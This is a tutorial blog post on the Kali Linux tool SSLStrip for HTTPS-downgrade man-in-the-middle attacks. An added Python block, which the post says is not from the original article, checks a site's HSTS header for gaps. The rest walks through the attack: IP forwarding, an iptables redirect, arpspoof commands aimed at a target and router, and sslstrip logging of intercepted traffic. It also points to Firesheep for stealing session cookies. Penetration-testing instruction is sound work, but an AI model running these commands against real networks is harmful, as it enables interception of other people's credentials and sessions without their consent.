Today we’re going to be taking a closer look at a useful Kali Linux tool called SSLStrip. As the name implies, it is useful for hijacking HTTP traffic and monitoring HTTPS traffic. Basically, it serves as a type of proxy that makes standard non-encrypted HTTP connections mirror the appearance of encrypted HTTPS sessions.
Using this tool, it’s possible to “strip” the security off of HTTPS, and turn an HTTPS link into a regular, plain-vanilla HTTP link, or even change an HTTPS link to an HTTPS link with a private key that the attacker already knows. This tool is rather tricky, too, because it will even send the padlock icon to a browser to give the appearance that the connection has been secured.
Essentially, this is a sophisticated version of an MITM (man-in-the-middle) attack. MITM attacks are really a rather large umbrella term to describe any attack that collects user data before sending it on to the appropriate destination host. And since you control that data, it’s possible to edit it and change the details before sending it on its merry way.
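The downgrade described above only works because the victim’s first request to a site goes out over plain HTTP, which is where the proxy rewrites the HTTPS links; HTTP Strict Transport Security (HSTS) is the server-side setting that closes that window for returning visitors (and for first visits, if the domain is preloaded). As an added example that is not from the original article or the sslstrip project, the following Python evaluates a site’s HSTS header for the gaps a stripping proxy relies on; the function names and the sample headers are constructed for the example.

```python
from typing import Dict, Optional

# One year in seconds; shorter policies lapse between visits and reopen the window.
MIN_MAX_AGE = 31536000

# Constructed sample responses (not captured from any real site).
SAMPLE_HEADERS = {
    "no_hsts": {"Content-Type": "text/html"},
    "strong": {"Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload"},
    "weak": {"strict-transport-security": "max-age=300"},
}


def parse_hsts(header_value: str) -> Optional[Dict[str, Optional[str]]]:
    """Parse an HSTS header into {lowercase directive: value-or-None}; returns None
    when the mandatory numeric max-age is absent (browsers ignore such a header)."""
    directives: Dict[str, Optional[str]] = {}
    for part in header_value.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            directives[name.strip().lower()] = value.strip().strip('"') or None
    if not (directives.get("max-age") or "").isdigit():
        return None
    return directives


def assess_downgrade_exposure(headers: Dict[str, str]) -> Dict[str, object]:
    """Summarise how much room an HTTPS-stripping proxy has against a site,
    given its response headers (header names are matched case-insensitively)."""
    hsts = None
    for name, value in headers.items():
        if name.lower() == "strict-transport-security":
            hsts = parse_hsts(value)
            break
    findings = []
    if hsts is None:
        findings.append("no valid HSTS header: every visit starts with a strippable HTTP request")
        return {"hsts": False, "max_age": 0, "subdomains": False, "preload": False, "findings": findings}
    max_age = int(hsts["max-age"])
    subdomains = "includesubdomains" in hsts
    preload = "preload" in hsts
    if max_age == 0:
        findings.append("max-age=0 clears the policy: browsers will accept plain HTTP again")
    elif max_age < MIN_MAX_AGE:
        findings.append(f"max-age {max_age}s is short: the policy lapses between visits")
    if not subdomains:
        findings.append("includeSubDomains missing: subdomains can still be downgraded")
    if not preload:
        findings.append("preload missing: the very first visit is still exposed")
    return {"hsts": True, "max_age": max_age, "subdomains": subdomains, "preload": preload, "findings": findings}
```

Feeding it the headers from a real response (for example via `requests.head(url).headers`) tells you whether a client that has visited the site before would still accept the stripped HTTP version.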
Installing SSLStrip and Running It
If it’s not already installed on your system, you can grab it at the usual github location. It is a Python tool, so it’s dependent upon Python 2.5 and later. I always recommend running an update before installing code, too. Not only will that ensure that all of your other packages and modules are up to date, but it will help avoid future headaches caused by contrived package dependency problems.
After that, you’re going to need to make a few configuration changes on your system as follows.
- Ensure your computer is in forwarding mode. Simply log in as root and run the following command: echo "1" > /proc/sys/net/ipv4/ip_forward
- Edit iptables to ensure that it can intercept HTTP requests. Once again, you’ll need to be logged in as the root user. Issue the following command: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port [DESIRED-LISTENING-PORT]
- Issue the sslstrip command from the BASH shell.
- Finally, you’ll need to run arpspoof to facilitate the MITM attack with the following syntax: arpspoof -i [YOUR-INTERFACE] -t [TARGET-IP-ADDRESS] [ROUTER-IP-ADDRESS] (note that -i takes the name of your network interface, such as eth0, not an IP address).
SSLStrip Command Syntax
The command syntax for SSLStrip is actually rather simple when compared to some of the more advanced Kali tools, such as Metasploit. The following will serve as a reference of the command’s various options and syntax:
Usage: sslstrip <options>
Options:
-w <filename>, --write=<filename>   Specify file to log to (optional).
-p, --post                          Log only SSL POSTs. (default)
-s, --ssl                           Log all SSL traffic to and from server.
-a, --all                           Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>          Port to listen on (default 10000).
-f, --favicon                       Substitute a lock favicon on secure requests.
-k, --killsessions                  Kill sessions in progress.
-h                                  Print this help message.
SSLStrip Usage Example
In this example, we’re going to write the results of SSLStrip to a log file. After the data is logged, you can use it as an input parameter for other hacking tools. SSL runs on port 443, but for the sake of simplicity, it’s pretty standard in the industry to set up listening ports for HTTP/HTTPS traffic on port 8080.
All of the well-known services typically run on ports below 1024, but past that, there are a lot of open ports. For that reason, it’s pretty safe to assume that port 8080 isn’t going to be used by a different service. The following is an example of using the SSLStrip command to log data after spoofing the ARP protocol:
- sslstrip -w mylogfile.log -l 8080
Note that you’ll want to be the root user when running this command. Naturally, the -w option tells sslstrip to write the data to a file, and the -l option tells it what port to listen on.
Final Thoughts
There are a myriad of MITM tools, and some of them even allow an attacker to steal live sessions with the click of a button. Though it is old and outdated, you can still find the Firesheep code online and install it in a web browser, allowing you to hijack session cookies. Last but not least, remember to abstain from using these tools in the real world for a malicious attack. Not only is it immoral, but you could wind up facing tough legal consequences should you get caught.